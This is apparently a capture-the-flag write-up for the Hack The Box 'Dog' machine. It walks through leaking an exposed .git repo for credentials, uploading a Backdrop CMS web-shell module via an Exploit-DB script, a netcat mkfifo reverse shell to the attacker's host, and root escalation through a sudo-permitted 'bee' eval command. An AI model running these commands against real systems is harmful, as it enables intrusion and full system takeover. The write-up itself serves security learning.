In this article, I’ll walk you through every step I took to own the Dog machine on Hack The Box. Dog is a Linux box focused on privilege escalation, so you’ll see how I went from initial access to root in a few well-planned moves. Let's get through this!
As with any penetration test, I began by establishing connectivity to the target environment through OpenVPN using my HTB credentials (note that I used a Kali virtual machine). After obtaining the target IP address (10.10.11.58), I proceeded with initial reconnaissance:
nmap -sV 10.10.11.58
Nmap told me port 80 (HTTP) was open and running a web server. Since web services often hide the easiest way in, I decided to focus there rather than brute-forcing SSH or other ports.
Entering this IP address in a browser led me to a website about Dogs (Pretty obvious since the machine is called Dog😅)
To poke around the website automatically, I used dirsearch:
dirsearch -u http://10.10.11.58/ -e * -r
This brute-forces directories and filenames with a big wordlist. Within seconds, it found a .git folder. This was a step in the right direction since Git repositories often leak source code and credentials.
Dirsearch also revealed a couple of accessible directories, one of them was /files, accessing it and looking around led me to a certain username: Tiffany
Not knowing what to do with this now, I filed it away, and perhaps it'll be useful in the future.
After mirroring the repository to my local machine, I restored the files to analyze their contents:
That reconstructed the web app’s code. In settings.php (or sometimes update.settings.json), I found a root password for the Backdrop CMS
wget --mirror -I .git http://10.10.11.58/.git/
cd downloaded-folder
ls -al
sudo git restore .
ls -al
cat settings.php
Back to the Dog homepage in my browser, I now attempted to log in. This proved to be a bit challenging as default credentials like admin: admin, admin: password, among other default credentials, didn't work.
Remembering the credentials from the settings.php file, I tried root: password-from-settings.php-file, but still, I couldn't gain access.
After multiple attempts, the credentials that worked were:
username: tiffany
password: password-from-settings.php-file
PS: Remember, I got the username 'tiffany' from exploring the /files directory as explained above.
Tip: This successful authentication is a classical example of a critical security principle: credential segregation. When organizations reuse credentials across different systems or fail to implement proper secrets management, the compromise of one system often leads to the compromise of others.
This is commonly reduced by the implementation of privileged access management systems and credential vaulting solutions.
Exposing Git repositories in production is a critical security vulnerability that violates the principle of least privilege. These repositories contain complete commit histories, which often include:
This exposure allows attackers to restore the entire codebase locally and analyze it for vulnerabilities at their leisure, dramatically increasing the attack surface.
In this case, examining the settings.php file revealed database credentials for Backdrop CMS, giving me the first significant foothold in the system.
Backdrop CMS is an enterprise-level content management system designed to provide a framework for building and managing websites. The presence of Backdrop CMS on this system indicated a structured web application with potentially exploitable modules and components.
Once inside the CMS, I looked for a file-upload feature ( in order to upload a PHP code for a reverse shell). This was not possible, so I checked the CMS version under Reports → Status Report. Then I researched for vulnerabilities in the CMS, ideally, one related to remote code execution, and hence gain a reverse shell.
I landed on an Exploit-DB entry by Ahmet Ümit BAYRAM, which was an Authenticated Remote Command Execution script for Backdrop CMS version 1.27.1 (this happens to be the same version of the CMS Dog is using)
Tip: It is important to know the exact version of whatever software you are working with. You can't go around running scripts unless you are sure that the software version in question is vulnerable to whatever you plan on exploiting with your script.
I downloaded it, made it executable, and ran it:
chmod +x 52021.py
python3 52021.py http://10.10.11.58
The exploit gave me a malicious module package (shell.zip) designed to give command execution capabilities. Following the upload process through the administrative interface:
Go to Functionality > Install Module > Manual Installation
Upload of the shell.zip file
Accessed it at '10.10.11.58/modules/shel1/shel1.php' in the browser
This gave me a simple web form where I could type commands. To get a proper reverse shell, I set up a listener on my Kali machine:
nc -lvp 5555
Through the web shell interface, | executed the following command:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 5555 > /tmp/f
This creates a circular pipeline where commands sent from the attacker are executed on the target with their output returned to the attacker, providing interactive remote shell access with the privileges of the web server user.
After a thorough enumeration of the system, I identified a user account named "johnsucack." Based on the previously observed password patterns, I attempted to switch users using the password that has been working so far (password-from-settings.php-file).
Once authenticated as the johnsucack user, I was able to access the user flag:
Privilege escalation requires careful enumeration of potential vectors. I began by examining the commands this user could execute with elevated privileges using the 'sudo -l' command
The output revealed that the johnsucack user had permission to execute the '/usr/local/bin/bee' binary with root privileges. This binary required further investigation on my end to understand its functionality and potential exploitation vectors.
After analyzing the binary and its execution parameters, I identified that it accepted a root parameter that defined a working directory and an eval parameter that could be used to execute arbitrary code.
I first tested command execution with a basic identification command:
sudo /usr/local/bin/bee --root=/var/www/html eval "system('id');"
The successful execution of this command with root privileges confirms the presence of a privilege escalation vector through this binary. The vulnerability exists because:
With the vector confirmed, I proceeded to establish a root shell:
sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash -p');"
This command follows the same structure as the previous test, but instead executes a privileged bash shell ( -p flag ensures the shell maintains its effective user ID, preventing it from dropping privileges).
This provides a root shell, allowing complete system access.
sudo -l
sudo /usr/local/bin/bee --root=/var/www/html eval "system('id');"
sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash -p');"
With root access established, I went to the root directory to obtain the final root flag
Dog walked me through a classic CMS-based attack: leak a Git repo, extract credentials, upload a backdoor module, get a reverse shell, then exploit a sudo rule.
Onto the next challenge!